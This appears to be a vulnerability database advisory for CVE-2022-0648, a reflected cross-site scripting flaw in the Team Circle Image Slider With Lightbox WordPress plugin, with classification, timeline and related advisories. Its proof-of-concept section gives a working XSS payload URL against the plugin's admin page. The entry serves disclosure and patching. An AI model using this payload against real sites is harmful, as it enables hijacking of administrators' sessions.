WordPress Plugin Vulnerabilities

Team Circle Image Slider With Lightbox < 1.0.16 - Reflected Cross-Site Scripting

Description

The plugin does not sanitize and escape the order_pos parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting.

Proof of Concept

https://example.com/wp-admin/admin.php?page=circle_thumbnail_slider_with_lightbox_image_management&order_pos=</script><svg/onload=alert(/XSS/)>

Affects Plugins

Plugin icon
circle-image-slider-with-lightbox
Fixed in 1.0.16

References

CVE
CVE-2022-0648

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Ran Crane
Submitter
Ran Crane
Verified
Yes
WPVDB ID
90f9ad6a-4855-4a8e-97f6-5f403eb6455d

Timeline

Publicly Published
2022-02-21 (about 1 years ago)
Added
2022-02-21 (about 1 years ago)
Last Updated
2022-04-10 (about 1 years ago)

Other

Published
Title
Published
2018-05-22
Title
Loginizer 1.3.8-1.3.9 - Unauthenticated Stored Cross-Site Scripting (XSS)
Published
2023-04-26
Title
ClickFunnels <= 3.1.1 - Contributor+ Stored XSS via Shortcode
Published
2015-06-25
Title
WP Mobile Detector <= 3.2 - Stored Cross-Site Scripting (XSS)
Published
2014-08-01
Title
WooCommerce SagePay Direct Payment Gateway 0.1.6.6 - pages/3DComplete.php Multiple Parameter Reflected XSS
Published
2014-08-01
Title
Group Documents 1.2.1 - Document Upload Multiple Field Stored XSS